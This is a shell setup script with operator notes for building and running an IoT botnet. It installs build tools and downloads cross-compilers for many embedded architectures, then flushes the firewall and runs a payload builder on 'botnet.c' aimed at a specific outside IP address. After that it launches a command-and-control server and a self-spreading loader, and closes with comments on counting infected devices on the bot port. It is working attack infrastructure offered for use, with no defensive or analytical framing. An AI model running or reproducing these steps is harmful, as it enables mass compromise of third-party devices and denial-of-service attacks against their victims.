yum update -y;yum install epel-release -y;yum groupinstall "Development Tools" -y;yum install gmp-devel -y;	
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10;yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y; 
rm -rf /usr/local/go; wget https://dl.google.com/go/go1.10.3.linux-amd64.tar.gz; 
sha256sum go1.10.3.linux-amd64.tar.gz; sudo tar -C /usr/local -xzf go1.10.3.linux-amd64.tar.gz; 
export PATH=$PATH:/usr/local/go/bin; source ~/.bash_profile; rm -rf go1.10.3.linux-amd64.tar.gz	
-

-
mkdir /etc/xcompile
cd /etc/xcompile 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget https://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2  
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
rm -rf *.tar.bz2
mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l
cd ~/

-
wget https://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
mv cross-compiler-armv6l armv6l
-
sed -i 's/1024/9999999/g' /usr/include/bits/typesizes.h

iptables -F; service iptables stop
service httpd restart
-

-
python payload.py botnet.c 179.43.140.172
-

-
cd ~/
chmod 0777 * -R
sh construct.sh  
-

-
ulimit -n 999999; ulimit -u 999999; ulimit -e 999999
cd /root/cnc
screen -S cnc ./a.out 3074 50 420
-

-
cd /root/loader
ulimit -n 999999
screen -S rep ./rep
-
#########################################################################
#TO GREP YOUR BOTPORT TO CLARIFY ESI IS WORKNG RUN THE FOLLOWING COMMAND#
#YOU MAY REPLACE "BOTPORT" WITH YOUR DESIGNATED BOTPORT!		        #
#########################################################################
#for s4y's Ebot source the default bot port is 3074                     #
#so once you infect some devices you may run this command below         #
#to ensure your not duplicating devices!                                #
#########################################################################
# netstat -anp | grep :3074 | grep ESTABLISHED | wc -l #
########################################################